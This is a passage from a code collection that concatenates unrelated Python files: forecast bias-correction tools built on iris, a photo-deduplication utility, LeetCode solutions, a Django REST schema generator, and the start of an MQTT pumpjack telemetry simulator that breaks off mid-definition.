either by a valid cf_units.Unit string specifier 'unit_str', or a cf_units.Unit object, 'cf_unit'.""" if unit_str is not None and cf_unit is not None: raise(ValueError("Only one unit can be provided.")) elif unit_str is not None: unit=cf_units.Unit(unit_str) elif cf_unit is not None: unit=cf_unit else: raise(ValueError("A unit must be provided.")) for key in self.data: for i,entry in enumerate(self.data[key]): entry.convert_units(unit) def change_dates(self,newdates): """ Redefines the 'dates' attribute to the list of 2 datetimes 'newdates', reapplying the "data" and "clim" constraints to match **currently quite slow for large cubelists** """ self.dates=newdates self._d_l,self._d_u=self.dates self.calendar_bounds=[d.timetuple().tm_yday for d in self.dates] CL_data=iris.cube.CubeList() CL_clim=iris.cube.CubeList() for key in self.data: a=self.data[key].extract(self.constraints["data"]) if a != []: CL_data.append(a) a=self.data[key].extract(self.constraints["clim"]) if a != []: CL_clim.append(a) CL_data=iris.cube.CubeList([c for C in CL_data for c in C]) CL_clim=iris.cube.CubeList([c for C in CL_clim for c in C]) self.data["data"]=CL_data.concatenate() self.data["clim"]=CL_clim.concatenate() def change_calendar(self,newcalendar): for key in self.data: for i,entry in enumerate(self.data[key]): newunit=cf_units.Unit(\ entry.coord("time").units.origin,calendar=newcalendar) self.data[key][i].coord("time").unit=newunit def aggregate_by(self,coords,bins,aggregator=iris.analysis.MEAN): """Aggregates the coordinates of all cubes in Dataset into user defined bins. Args: *coords - A list of strings which are the coordinates to be aggregated over. *bins - A corresponding list of lists 'bins'. bins[i] should contain the bounding values over which to group coords[i]. Kwargs: *aggregator -A valid iris.analysis.Aggregator object which specifies how to aggregate entries together. """ binlabels=[] for j,coord in enumerate(coords): binlabels.append(f"bin{j}") for key in self.data: for i,entry in enumerate(self.data[key]): for j,(coord,b) in enumerate(zip(coords,bins)): #remove potential old bins: if self.data[key][i].coords(f"bin{j}")!=[]: self.data[key][i].remove_coord(f"bin{j}") if self.data[key][i].coords(coord)==[]: raise(ValueError("No such coordinate in cube!")) label=np.digitize(entry.coord(coord).points,b) coord_dim=entry.coord_dims(entry.coord(coord)) entry.add_aux_coord(iris.coords.AuxCoord(label,\ var_name=f"bin{j}"),data_dims=coord_dim) self.data[key][i]=entry.aggregated_by(binlabels,aggregator) for j,coord in enumerate(coords): if self.data[key][i].coords(coord)!=[]: self.data[key][i].remove_coord(f"bin{j}") def collapse_over(self,coord,aggregator=iris.analysis.MEAN): """Collapses all cubes in Dataset over a single coordinate. Args: *coords - A string which is the coordinate to collapse. Kwargs: *aggregator -A valid iris.analysis.Aggregator object which specifies how to collapse the coordinate. """ for key in self.data: for i,entry in enumerate(self.data[key]): self.data[key][i]=self.data[key][i].collapsed(coord,aggregator) def apply_coslat_mean(self,mask=None): """Collapses the latitude and longitude coordinates of all cubes in Dataset, using a cosine latitude weighting. Kwargs: *mask: A cube with matching latitude and longitude coordinates to the cubes in Dataset. Each gridpoint in 'mask' should vary between 0 (totally masked) to 1 (totally unmasked). """ for key in self.data: for i,entry in enumerate(self.data[key]): weights = cosine_latitude_weights(entry) #include the land sea mask in the weighting if one was passed. if mask is not None: weights=weights*mask.data self.data[key][i]=entry.collapsed(["latitude","longitude"],\ iris.analysis.MEAN,weights=weights) def regrid_to(self,dataset=None,cube=None,regridder=iris.analysis.Linear()): """regrids every cube in Dataset to match either those of another Dataset object, or an iris.Cube object.""" if cube is None and dataset is None: raise(ValueError("No reference for regridding provided!")) elif cube is None: ref_cube=dataset.data["data"][0] else: ref_cube=cube for key in self.data: for i,entry in enumerate(self.data[key]): self.data[key][i]=entry.regrid(ref_cube,regridder) def apply(self,func,*args,in_place=True,keys=None,**kwargs): """A method which applies a function to every cube in Dataset Args: *func - A function of the type func(cube,*args,**kwargs). Kwargs: in_place - A boolean, specifying whether func returns an output or not. If True, cube is set equal to func(cube), unless the output is None, in which case cube is removed from the CubeList. """ if keys is None: keys=self.data for key in keys: for i,entry in enumerate(self.data[key]): result=func(entry,*args,**kwargs) if in_place: pass else: if result is not None: self.data[key][i]=result else: self.data[key].remove(self.data[key][i]) def apply_constraint(self,constraint,keys=None): """Apply a constraint to all cubes in Dataset""" if keys is None: keys=self.data for key in keys: self.data[key]=self.data[key].extract(constraint) def get_climatology(self,percentiles): """Finds the distribution of all values in the Dataset. Args: * percentiles - A numpy array ([p_1,...,p_N]) where 0<=p_i<=100, which defines the percentiles of the data distribution to calculate. """ self.percentiles=percentiles lat,lon=self.data["clim"][0].shape[-2:] dist=np.zeros([1,lat,lon]) #We call the whole cubelist into memory self.data["clim"].realise_data() dist=np.concatenate([f.data.reshape([-1,lat,lon]) for f in self.data["clim"]]) self.distribution=np.percentile(dist,percentiles,axis=0) self.distribution[0]-=0.01 means=np.zeros([len(percentiles)-1,lat,lon]) for i in range(len(percentiles)-1): for j in range(lat): for k in range(lon): means[i,j,k]=dist[np.digitize(dist[:,j,k],\ self.distribution[:,j,k],right=True)==i+1,j,k].mean() #interpolates empty bins as being halfway between the distribution bounds for i,j,k in np.argwhere(np.isnan(means)): means[i,j,k]=self.distribution[i:i+2,j,k].mean() self.dist_means=means def get_seasonal_cycle(self,N=4,period=365.25,keys=None): """Fits N sine modes to the data series, with frequencies of n/(365.25 days) for n in [1,...,N], in order to calculate a smooth seasonal cycle. Kwargs: *keys - A list of keys to self.data, specifying which data to use to calculate the cycle. If keys is None, all data in the dataset will be used. """ #Default is to include all data if keys is None: keys = [key for key in self.data] self.deseasonaliser=_Deseasonaliser(self.data,keys,N,period) self.deseasonaliser.fit_cycle() def remove_seasonal_cycle(self,deseasonaliser=None,strict_t_ax=False): if deseasonaliser is None: if self.deseasonaliser is None: raise(ValueError("No _Deseasonaliser object found.")) else: deseasonaliser=self.deseasonaliser if deseasonaliser.coeffs is None: deseasonaliser.fit_cycle() for key in self.data: for i,cube in enumerate(self.data[key]): cycle=deseasonaliser.evaluate_cycle(cube.coord("time"),strict=strict_t_ax) if cycle.shape!=cube.shape: dim_map=[cube.coord_dims(coord)[0] for coord in \ ["time","latitude","longitude"]] cycle=iris.util.broadcast_to_shape(cycle,cube.shape,dim_map) self.data[key][i].data=cube.data-cycle def set_time_axis_first(self,tname="time"): for key in self.data: for entry in self.data[key]: t_ax=entry.coord_dims(tname)[0] if t_ax!=0: ax=np.arange(entry.ndim) entry.transpose([t_ax,*ax[ax!=t_ax]]) class _Deseasonaliser: def __init__(self,data,keys,N,period=365.25,coeffs=None): self.raw_data=[] self.t=[] self.t_unit=None self.tref=None self.keys=keys self.N=N self.pnum=2*(N+1) self.period=period self.coeffs=None for key in keys: for cube in data[key]: self.raw_data.append(cube.data) if self.t_unit is not None: if self.t_unit!=cube.coord("time").units: raise(ValueError("Clashing time units in data.")) else: self.t_unit=cube.coord("time").units self.t.append(cube.coord("time").points) i=cube.coord_dims("time")[0] self.raw_data=np.concatenate(self.raw_data,axis=i) self.t=np.concatenate(self.t,axis=i) self._setup_data() self.lat,self.lon=self.raw_data.shape[1:] def _setup_data(self): self.raw_data=self.raw_data[np.argsort(self.t)] self.t.sort() self.tref=self.t[0] self.t=(self.t-self.tref)%self.period #intelligently guesses initial parameters def _guess_p(self,tstd): p=np.zeros(self.pnum) for i in range(0,self.N): p[2+2*i]=tstd/(i+1.0) return p def _change_calendar(self,new_calendar): self.t_unit=cf_units.Unit(self.t_unit.origin,calendar=new_calendar) #defines multimode sine function for fitting def _evaluate_fit(self,x,p,N): ans=p[0]*x+p[1] for i in range(0,N): ans+=p[2*i+2] * np.sin(2 * np.pi * (i+1)/365.25 * x + p[2*i+3]) return ans #defines error function for optimisation def _get_residual(self,p,y,x,N): return y - self._evaluate_fit(x,p,N) def fit_cycle(self): from scipy.optimize import leastsq fit_coeffs=np.zeros([self.pnum,self.lat,self.lon]) for i in range(self.lat): for j in range(self.lon): griddata=self.raw_data[:,i,j] tstd=griddata.std() p0=self._guess_p(tstd) plsq=leastsq(self._get_residual,p0,args=(griddata,self.t,self.N)) fit_coeffs[:,i,j]=plsq[0] self.coeffs=fit_coeffs def evaluate_cycle(self,t,strict=False): t=t.copy() if self.coeffs is None: raise(ValueError("No coefficients for fitting have been calculated yet.")) if t.units!=self.t_unit: if t.units.is_convertible(self.t_unit): t.convert_units(self.t_unit) elif (t.units.origin==self.t_unit.origin) and (not strict): t.units=cf_units.Unit(t.units.origin,calendar=self.t_unit.calendar) else: raise(ValueError("Units of time series to evaluate are \ incompatible with units of fitted time series.")) t=t.points t=(t-self.tref)%self.period cycle=np.zeros([len(t),self.lat,self.lon]) for i in range(self.lat): for j in range(self.lon): cycle[:,i,j]=self._evaluate_fit(t,self.coeffs[:,i,j],self.N) return cycle """Analysis is a subclass of Dataset that deals with reanalysis. At the moment specific to era5, but that should be changed if more analyses start being used.""" class Analysis(Dataset): def _setup(self): self.path="/mnt/seasonal/reanalysis/era5/"+self.field+"/" self.type=Analysis def _clean_loaded_data(self): for i in range(len(self.data)): self.data[i].metadata.attributes.clear() self.data[i].coord("latitude").points=\ self.data[i].coord("latitude").points.astype(np.float32) self.data[i].coord("longitude").points=\ self.data[i].coord("longitude").points.astype(np.float32) self.data=self.data.concatenate_cube() try: self.data.coord(self.T).convert_units(self.U) except: print(f"Warning: could not convert {self.T} to {self.U}, simply renaming calendar.") new_T=cf_units.Unit(self.data.coord(self.T).units.origin,self.U.calendar) self.data.coord(self.T).units=new_T try: self.data.coord(self.T).convert_units(self.U) except: raise(ValueError("Unsuccesful attempt to change time units.")) iccat.add_hour(self.data,self.T) self.data=self.data.extract(self.constraints["hour"]) iccat.add_day_of_year(self.data,self.T) self.data=self.data.extract(self.constraints["calendar"]) self.data=iris.cube.CubeList([self.data]) class Forecast(Dataset): def _setup(self): self.T="forecast_reference_time" self.S="forecast_period" self.R="realisation" self._l_l,self._l_u=self.leads self.type=Forecast self.t=1 self._fsetup() self.constraints["lead"]=iris.Constraint(coord_values={self.S:\ lambda cell:(self._l_l<=cell)and (cell<=self._l_u)}) self.constraints["ens"]=iris.Constraint(coord_values={self.R:\ lambda cell: cell.point<self.max_ens}) #Used by derived classes def _fsetup(self): pass def get_quantile_correction(self,analysis): if self.dist_means is None: raise(ValueError("Must get forecast climatology first.")) if analysis.dist_means is None: raise(ValueError("Must get analysis climatology first.")) if not np.all(analysis.percentiles == self.percentiles): raise(ValueError("These datasets have incomparable climatologies.")) self.quantile_correction=analysis.dist_means-self.dist_means def apply_quantile_correction(self): lat,lon=self.data["data"][0].shape[-2:] for i,entry in enumerate(self.data["data"]): shape=entry.data.shape data=entry.data.reshape([-1,lat,lon]) for x in range(lat): for y in range(lon): which_bin=np.digitize(data[:,x,y],self.distribution[:,x,y],right=True) which_bin[which_bin==0]+=1 #cold outliers put in 0-5% bin which_bin[which_bin==len(self.percentiles)]-=1 #warm outliers in 95-100% bin which_bin-=1 #indexing from zero correction=self.quantile_correction[:,x,y][which_bin] data[:,x,y]+=correction data=data.reshape(shape) self.data["data"][i].data=data self.data["data"][i].long_name="corrected "+self.data["data"][i].name() class SubxForecast(Forecast): def _fsetup(self): self.path="/mnt/seasonal/subx/"+self.field+"/" self.R="realization" self.max_ens=11 self.type=SubxForecast def _clean_loaded_data(self): CL=iris.cube.CubeList() for i,cube in enumerate(self.data): for entry in cube.slices_over(self.T): entry.coord(self.T).convert_units(self.U) T_ref=entry.coord(self.T) S=entry.coord(self.S).points t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time") t_coord.units=T_ref.units entry.add_aux_coord(t_coord,data_dims=1) iccat.add_hour(entry,"time") iccat.add_day_of_year(entry,"time") CL.append(entry) CL.sort(key=lambda cube:cube.coord(self.T).points[0]) self.data=CL self.data=self.data.extract(self.constraints["calendar"]) self.data=self.data.extract(self.constraints["lead"]) self.data=self.data.extract(self.constraints["hour"]) self.data=self.data.extract(self.constraints["ens"]) def remove_masked(self): for key in self.data: self.data[key].realise_data() masked=[] for entry in self.data[key]: if not np.all(entry.data.mask==False): masked.append(entry) for entry in masked: self.data[key].remove(entry) class EC45Forecast(Forecast): def _fsetup(self): self.path="/mnt/seasonal/ec45/netcdf/"+self.field+"/" self.max_ens=11 self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\ calendar=cf_units.CALENDAR_PROLEPTIC_GREGORIAN) self.type=EC45Forecast def _clean_loaded_data(self): CL=iris.cube.CubeList() for i,cube in enumerate(self.data): for entry in cube.slices_over(self.T): entry.coord(self.T).convert_units(self.U) entry.coord(self.S).convert_units(cf_units.Unit("Days")) T_ref=entry.coord(self.T) S=entry.coord(self.S).points t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time") t_coord.units=T_ref.units entry.add_aux_coord(t_coord,data_dims=1) iccat.add_hour(entry,"time") iccat.add_day_of_year(entry,"time") CL.append(entry) CL.sort(key=lambda cube:cube.coord(self.T).points[0]) self.data=CL self.data=self.data.extract(self.constraints["calendar"]) self.data=self.data.extract(self.constraints["lead"]) self.data=self.data.extract(self.constraints["hour"]) self.data=self.data.extract(self.constraints["ens"]) class Seas5Forecast(Forecast): def _fsetup(self): self.path="/mnt/seasonal/seas5/"+self.field+"/" self.max_ens=25 self.R="realization" self.U=cf_units.Unit(f"Days since {cf_units.EPOCH}",\ calendar=cf_units.CALENDAR_PROLEPTIC_GREGORIAN) self.type=Seas5Forecast def _clean_loaded_data(self): CL=iris.cube.CubeList() for i,cube in enumerate(self.data): for entry in cube.slices_over(self.T): entry.coord(self.T).convert_units(self.U) entry.coord(self.S).convert_units(cf_units.Unit("Days")) T_ref=entry.coord(self.T) S=entry.coord(self.S).points t_coord=iris.coords.AuxCoord(S+T_ref.points[0],standard_name="time") t_coord.units=T_ref.units entry.add_aux_coord(t_coord,data_dims=1) iccat.add_hour(entry,"time") iccat.add_day_of_year(entry,"time") CL.append(entry) CL.sort(key=lambda cube:cube.coord(self.T).points[0]) self.data=CL self.data=self.data.extract(self.constraints["calendar"]) self.data=self.data.extract(self.constraints["lead"]) self.data=self.data.extract(self.constraints["hour"]) self.data=self.data.extract(self.constraints["ens"]) """An example script: Here we want to look at week 3 forecasts around second week of June 2003. We use a 21 day window, including the first and third weeks. We want weekly mean temperatures averaged over France, for the EC45, SUBX and SEAS5 forecast systems. We also want to debias our forecasts, using a climatology of past dates. """ #All bounds are inclusive. #3 week period centred around 11/6/2003 dates=[dt.datetime(2003,6,1,12),dt.datetime(2006,6,21,12)] leads=[14.5,20.5] #Week 3, in days. We want midday, so we add .5 run=False if run: #Load and restrict to the region around France import time t0=time.time() A=Analysis("T2m",dates) A.load_data() A.restrict_area("France") Fx=SubxForecast("T2m",dates,leads) Fx.load_data() Fx.restrict_area("France") Fec=EC45Forecast("2T",dates,leads) Fec.load_data() Fec.restrict_area("France") Fs=Seas5Forecast("T2m",dates,leads) Fs.load_data() Fs.restrict_area("France") t1=time.time() print(f"loaded data (t={t1-t0:.1f}).") #Fx has the lowest spatial resolution A.regrid_to(Fx) Fec.regrid_to(Fx) Fs.regrid_to(Fx) t2=time.time() print(f"regridded data (t={t2-t1:.1f}).") #Backups of the uncorrected forecasts so we dont have to reload. Fx_bkp=Fx.copy() Fs_bkp=Fs.copy() Fec_bkp=Fec.copy() #Compute 5% bins for climatology calculations #We want our climatology to be computed for daily, gridpoint values: percentiles=np.linspace(0,100,21) A.get_climatology(percentiles) Fx.get_climatology(percentiles) Fs.get_climatology(percentiles) Fec.get_climatology(percentiles) Fx.get_quantile_correction(A) Fs.get_quantile_correction(A) Fec.get_quantile_correction(A) t3=time.time() print(f"computed corrections (t={t3-t2:.1f}).") Fx.apply_quantile_correction() Fs.apply_quantile_correction() Fec.apply_quantile_correction() t4=time.time() print(f"applied corrections (t={t4-t3:.1f}).") #After error correcting we want to take weekly means. We exclude any #forecasts that aren't 7 days long: full_week=iris.Constraint(cube_func=lambda cube: cube.coord("forecast_period").shape[0]==7) Fx.apply_constraint(full_week) Fs.apply_constraint(full_week) Fec.apply_constraint(full_week) #We then collapse the time axis to get weekly means: A.apply(lambda cube: cube.collapsed(A.T,iris.analysis.MEAN)) Fx.apply(lambda cube: cube.collapsed(Fx.S,iris.analysis.MEAN)) Fs.apply(lambda cube: cube.collapsed(Fs.S,iris.analysis.MEAN)) Fec.apply(lambda cube: cube.collapsed(Fec.S,iris.analysis.MEAN)) #We load the land/sea mask and apply the area reduction: MASK_PATH="/mnt/seasonal/land_sea_mask/NAVO_lsmask_1deg.nc" sea_mask=iris.load_cube(MASK_PATH) sea_mask=sea_mask.regrid(Fx.data["data"][0],iris.analysis.Linear()) A_reduced=A.copy().apply_coslat_mean(mask=sea_mask) Fx.apply_coslat_mean(mask=sea_mask) Fs.apply_coslat_mean(mask=sea_mask) Fec.apply_coslat_mean(mask=sea_mask) t5=time.time() print(f"collapsed lat and lon (t={t5-t4:.1f}).") print("finished!") ```
{ "source": "josh-dot-com/photo-deduplication", "score": 3 }
#### File: photo-deduplication/src/hasher.py ```python from PIL import Image from imagededup.methods import PHash, AHash, DHash, WHash from imagehash import average_hash, phash, dhash, whash, colorhash, crop_resistant_hash class Hasher: IMAGEDEDUP_HASHER_LIST = [PHash, AHash, DHash, WHash] IMAGEDEDUP_HASHERS = { h.__name__.lower(): h() for h in IMAGEDEDUP_HASHER_LIST } IMAGEHASH_FUNCTION_LIST = [average_hash, phash, dhash, whash, colorhash, crop_resistant_hash] IMAGEHASH_FUNCTIONS = { f.__name__.lower(): f for f in IMAGEHASH_FUNCTION_LIST } def __init__(self): self.hashers = self.__class__.IMAGEDEDUP_HASHERS self.hash_funcs = self.__class__.IMAGEHASH_FUNCTIONS def imagededup_encode(self, photos): encodings = {} for photo in photos: hashes = {} for name, hasher in self.hashers.items(): hashes[name] = hasher.encode_image(image_file=photo.abspath()) encodings[photo.id] = hashes return encodings def imagehash_encode(self, photos): encodings = {} for photo in photos: pil_photo = Image.open(photo.abspath()) encodings[photo.id] = {name: str(func(pil_photo)) for name, func in self.hash_funcs.items()} return encodings def encode_video(self, videos): # TODO process video poritons of live photos # https://stackoverflow.com/questions/9896644/getting-ffprobe-information-with-python pass def find_duplicates(self, photos): return { n: self.__find_duplicates_with_hasher(n, h, photos) for n, h in self.hashers.items() } def __find_duplicates_with_hasher(self, hasher_name, hasher, photos): encoding_map = { photo.abspath(): photo.hashes[hasher_name] for photo in photos } duplicates = hasher.find_duplicates(encoding_map=encoding_map, scores=True) return duplicates ``` #### File: photo-deduplication/src/main.py ```python import os import logging from argparse import ArgumentParser from sqlalchemy import or_ import osxphotos from hasher import Hasher from db import \ LibraryType, Library, Photo, Duplicate, HashLibrary, HashAlgoritm, Encoding, \ get_hash_algo, fetch_or_initialize_db DATABASE_DEFAULT_PATH = "assets/duplicates.db" SUPPORTED_IMAGE_FORMATS = set( ['JPEG', 'PNG', 'BMP', 'MPO', 'PPM', 'TIFF', 'GIF', 'SVG', 'PGM', 'PBM'] ) def parse_args(): parser = ArgumentParser(description='Deduplicate photo albums') parser.add_argument('-d', '--db_path', type=str,#check_path_existence("database file"), action='store', default=DATABASE_DEFAULT_PATH, help=f"database file path where results persist (defaults to {DATABASE_DEFAULT_PATH})") parser.add_argument('paths', metavar='path', type=check_path_existence('photo library path'), nargs='*', action='extend', help="path to .photoslibrary or photo directory") parser.add_argument('-v', '--verbose', action='store_true', help="verbose logging") parser.add_argument('--dry-run', action='store_true', help="do not write or encode. list what operations would be performed") return parser.parse_args() def check_path_existence(arg_name): def check_name(path): abspath = os.path.abspath(os.path.expanduser(path)) if not os.path.exists(abspath): logging.error(f"{arg_name} does not exist: {path}") exit(55) return abspath return check_name def fetch_libraries(paths, db): # TODO @j000shDotCom separate directories from apple photos return [fetch_or_initialize_library(path, db) for path in paths], [] def fetch_or_initialize_library(library_path, db): library_name = os.path.basename(library_path) conditions = or_(Library.path == library_path, Library.name == library_name) library = db.query(Library).filter(conditions).first() if not library: logging.info(f"Creating Library: ${library_name}") library = Library(name=library_name, path=library_path, type=LibraryType.apple_photos) db.add(library) db.commit() return library def fetch_photos(library): photosdb = osxphotos.PhotosDB(library.path) images = photosdb.photos(images=True, movies=False) videos = [] # photosdb.photos(images=False, movies=True) albums = {} # photosdb.albums_as_dict photos = [ Photo(p, library) for p in filter(is_image_supported, images) ] logging.info(f"Found {len(photos)} photos, {len(videos)} videos, {len(albums)} albums") return (photos, videos, albums) def is_image_supported(photo): file_extension = os.path.splitext(photo.path)[1] return file_extension[1:].upper() in SUPPORTED_IMAGE_FORMATS def persist_photos(photos, db): logging.info(f"INSERTING {len(photos)} NEW PHOTOS") db.add_all(photos) db.commit() # TODO fix the re-insertion of photos # conditions = Photo.uuid.in_([p.uuid for p in photos]) # db_photos = { p[0] for p in db.query(Photo.uuid).filter(conditions).all() } # new_photos = [ p for p in photos if p.uuid not in db_photos ] # if new_photos: # logging.info(f"INSERTING {len(photos)} NEW PHOTOS") # db.add_all(photos) # db.commit() def persist_duplicates(library, duplicates, encodings, db): logging.info("Persisting duplicates") # get fresh photo data from the database photos = db.query(Photo).filter_by(library_id=library.id).all() dupes = db.query(Duplicate).filter_by(library_id=library.id).all() id_photos = { p.id: p for p in photos } keyed_photos = { p.abspath(): p for p in photos } org = {} for d in dupes: temp = org[d.hash_name] if d.hash_name in org else {} org[d.hash_name] = temp op = id_photos[d.orig_photo_id] op_path = op.abspath() dp = id_photos[d.dup_photo_id] temp = org[d.hash_name][op_path] if op_path in org[d.hash_name].keys() else set() org[d.hash_name][op_path] = temp org[d.hash_name][op_path].add(dp.abspath()) db_duplicates = [] for hash_name, photos in duplicates.items(): for orig_photo_path, photo_duplicates in photos.items(): existingpaths = org[hash_name][orig_photo_path] if org and org[hash_name] and orig_photo_path in org[hash_name] else set() for dup_photo_path, score in photo_duplicates: if dup_photo_path in existingpaths: continue dupe = Duplicate( library_id=library.id, orig_photo_id=keyed_photos[orig_photo_path].id, dup_photo_id=keyed_photos[dup_photo_path].id, hash_name=hash_name, hash_value=keyed_photos[orig_photo_path].hashes[hash_name], score=score ) db_duplicates.append(dupe) if db_duplicates: logging.info(f"INSERTING {len(db_duplicates)} NEW DUPLICATES") db.add_all(db_duplicates) db.commit() def main(): args = parse_args() library_paths = args.paths if not library_paths: logging.error('no libraries specified') last_library_path = osxphotos.utils.get_last_library_path() system_library_path = osxphotos.utils.get_system_library_path() resp = input(f"use last .photoslibrary ({last_library_path}) [Y/n] ") if not resp or resp.lower() == 'y': library_paths.append(last_library_path) else: exit(2) db_session = fetch_or_initialize_db(args.db_path) applephotos, directories = fetch_libraries(library_paths, db_session) photos, videos, albums = fetch_photos(applephotos[0]) # TODO # TODO replace these dry-run guards with decorators if args.dry_run: logging.info('[dry-run] skipping photo persistence') else: logging.info('Persisting photo data') persist_photos(photos, db_session) hasher = Hasher() if args.dry_run: logging.info('[dry-run] skipping image encoding') else: logging.info("Encoding images with imagededup") imagededup_encodings = hasher.imagededup_encode(photos) logging.info("Encoding images with imagehash") imagehash_encodings = hasher.imagehash_encode(photos) logging.info('Persisting photo encodings') encodings = [] for photo in photos: photo_id = photo.id for hash_name, value in imagededup_encodings[photo_id].items(): enc = Encoding(photo_id=photo_id, hash_library=HashLibrary.imagededup, \ algorithm=get_hash_algo(hash_name), value=value) encodings.append(enc) for hash_name, value in imagehash_encodings[photo_id].items(): enc = Encoding(photo_id=photo_id, hash_library=HashLibrary.imagehash, \ algorithm=get_hash_algo(hash_name), value=value) encodings.append(enc) db_session.add_all(encodings) db_session.commit() if args.dry_run: logging.info('[dry-run] skipping deduplication check and persistence') else: pass # TODO make this smarter AND ASYNC # logging.info("Deduplicating images") # duplicates = hasher.find_duplicates(photos) # persist_duplicates(library, duplicates, encodings, db_session) if __name__ == "__main__": main() ```
{ "source": "josh-dp/LeetCode-Solutions", "score": 4 }
#### File: LeetCode-Solutions/Python/1277. CountSquareSubmatricesWithAllOnes.py ```python def count_squares(matrix): # dp to store the maximum no. of squares possible at that place dp = [[0 for i in range(len(matrix[0]))] for j in range(len(matrix))] # ans stores the total no. of squares formed. ans = 0 # Looping through each cell of the given matrix. for i in range(len(matrix)): for j in range(len(matrix[0])): # Corner cases as only square of dimensions [1*1] can be formed at 0th row and 0th column. if i == 0 or j == 0: dp[i][j] = matrix[i][j] else: if matrix[i][j] == 0: dp[i][j] = 0 else: # Taking minimum of the left surrounding and adding one (for [1*1] square formed). dp[i][j] = min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1]) + 1 # updating our answer. ans += dp[i][j] return ans # This code is contributed by <NAME>. # Example : matrix = [ [0, 1, 1, 1], [1, 1, 1, 1], [0, 1, 1, 1] ] print(count_squares(matrix)) ``` #### File: LeetCode-Solutions/Python/longestMountatinSubarray..py ```python def longest_mountain_subarray(a): max_len = 0 for i in range(1, len(a) - 1): # Finding peak. if a[i] > a[i + 1] and a[i] > a[i - 1]: # pointer which will move to the left. l = i # pointer which will move to right. r = i while l > 0 and a[l] > a[l - 1]: l -= 1 while r < len(a) - 1 and a[r] > a[r + 1]: r += 1 # calculating max length. max_len = max(max_len, (r - l) + 1) return max_len # Example test case. a = [2, 1, 4, 7, 3, 2, 5] print(longest_mountain_subarray(a)) ```
{ "source": "joshdrake/django-rest-framework-json-schema", "score": 2 }
#### File: django-rest-framework-json-schema/rest_framework_json_schema/metadata.py ```python from collections import OrderedDict from django.utils.text import force_text from rest_framework import metadata, serializers from rest_framework.utils.field_mapping import ClassLookupDict from .serializers import ModelClassSerializer class JSONSchemaMetadataMixin(object): label_lookup = ClassLookupDict({ serializers.Field: 'object', serializers.BooleanField: 'boolean', serializers.CharField: 'string', serializers.URLField: 'string', serializers.EmailField: 'string', serializers.RegexField: 'string', serializers.SlugField: 'string', serializers.IntegerField: 'integer', serializers.FloatField: 'number', serializers.DecimalField: 'number', serializers.DateField: 'string', serializers.DateTimeField: 'string', serializers.ChoiceField: 'enum', serializers.FileField: 'string', serializers.PrimaryKeyRelatedField: 'integer', serializers.SlugRelatedField: 'enum', serializers.HyperlinkedRelatedField: 'string', serializers.HyperlinkedIdentityField: 'string', }) def __init__(self, *args, **kwargs): super(JSONSchemaMetadataMixin, self).__init__(*args, **kwargs) def get_serializer_info(self, serializer): opts = serializer.Meta.model._meta schema = { 'rels': {}, 'links': [], 'properties': OrderedDict(), 'required': [], } for field_name, field in serializer.fields.items(): if getattr(field, 'read_only', False): continue schema['properties'][field_name] = self.get_field_info(field) if getattr(field, 'required', False): schema['required'].append(field_name) if isinstance(field, serializers.RelatedField): field__name = field_name link = { 'rel': field__name, } if isinstance(field, serializers.HyperlinkedRelatedField): link['href'] = "{{{}}}".format(field_rel) schema['links'].append(link) schema['rels'][field_name] = ModelClassSerializer(field.queryset.model).data, if isinstance(field, serializers.Serializer): related_schema = self.get_serializer_info(field) field_info = { 'type': 'object', 'properties': related_schema['properties'], } if isinstance(field, serializers.ListSerializer): field_info = { 'items': field_info, 'type': 'array', } schema['properties'][field_name] = field_info return schema def get_field_info(self, field): """ Given an instance of a serializer field, return a dictionary of metadata about it. """ field_info = OrderedDict() field_info['type'] = self.label_lookup[field] attribute_map = { 'label': 'title', 'help_text': 'description', } format_map = ClassLookupDict({ serializers.Field: None, serializers.URLField: 'uri', serializers.EmailField: 'email', serializers.DateTimeField: 'date-time', serializers.DateField: 'date-time', serializers.FileField: 'file', serializers.HyperlinkedRelatedField: 'uri', serializers.HyperlinkedIdentityField: 'uri', }) for attr in ['min_length', 'max_length', 'label', 'help_text']: dest = attribute_map.get(attr, attr) value = getattr(field, attr, None) if value is not None and value != '': field_info[dest] = force_text(value, strings_only=True) format = format_map[field] if format: field_info['format'] = format if hasattr(field, 'choices') and not isinstance(field, serializers.RelatedField): field_info['enum'] = field.choices.keys() field_info['choices'] = [ {'value': value, 'display_name': display_name} for value, display_name in field.choices.iteritems() ] if isinstance(field, serializers.RelatedField): if isinstance(field, serializers.ListSerializer): field_info['items'] = {'type': field_info['type']} if 'format' in field_info: field_info['items']['format'] = field_info.pop('format') field_info['type'] = 'array' return field_info class JSONSchemaMetadata(JSONSchemaMetadataMixin, metadata.SimpleMetadata): pass ```
{ "source": "joshdreagan/iot-demo", "score": 2 }
#### File: iot/pumpjack/sim.py ```python import click import json import paho.mqtt.publish as publish import random import shutil import time from urllib.parse import urlparse now = lambda: int(round(time.time() * 1000)) def __msg(topic, payload, qos=0, retain=False): return { "topic": topic, "payload": payload, "qos": qos, "retain": retain } def __payload(location_id, rig_id, time, type, data=None): return { "locationId": location_id, "rigId": rig_id, "time": time, "source": "pumpjack", "type": type, "data": (data if data!=None else {}) } def __heartbeat(location_id, rig_id, time): data = None return __payload(location_id, rig_id, time, "heartbeat", data) def __tachometer(location_id, rig_id, time, speed, speed_variance): data = { "rpm": random.uniform(max(0, speed - speed_variance), max(0, speed + speed_variance)) } return __payload(location_id, rig_id, time, "tachometer", data) def __piezo(location_id, rig_id, time, frequency, frequency_variance): data = { "vibrationFrequency": random.uniform(max(0, frequency - frequency_variance), max(0, frequency + frequency_variance)) } return __payload(location_id, rig_id, time, "piezo", data) @click.command(context_settings={ "max_content_width": shutil.get_terminal_size()[0] }) @click.option("--location-id", help="The unique identifier for the location.") @click.option("--rig-id", help="The unique identifier for the rig.") @click.option("--broker-username", help="The username for the MQTT broker.") @click.option("--broker-password", hide_input=True, prompt=True, confirmation_prompt=True, help="The password for the MQTT broker.") @click.option("--telemetry-topic", default="iot.telemetry", show_default=True, help="The topic to send the telemetry data to.") @click.option("--telemetry-frequency", type=click.IntRange(min=1, max=None), default=5, show_default=True, help="The frequency (in seconds) of the telemetry messages.") @click.option("--buffer-timeout", type=click.IntRange(min=1000, max=None), default=10000, show_default=True, help="The time (in millis) to wait before sending each batch of messages to the MQTT broker.") @click.option("--tachometer-enabled", is_flag=True, default=True, show_default=True, help="Whether or not to send tachometer sensor telemetry messages.") @click.option("--tachometer-rotation-speed", 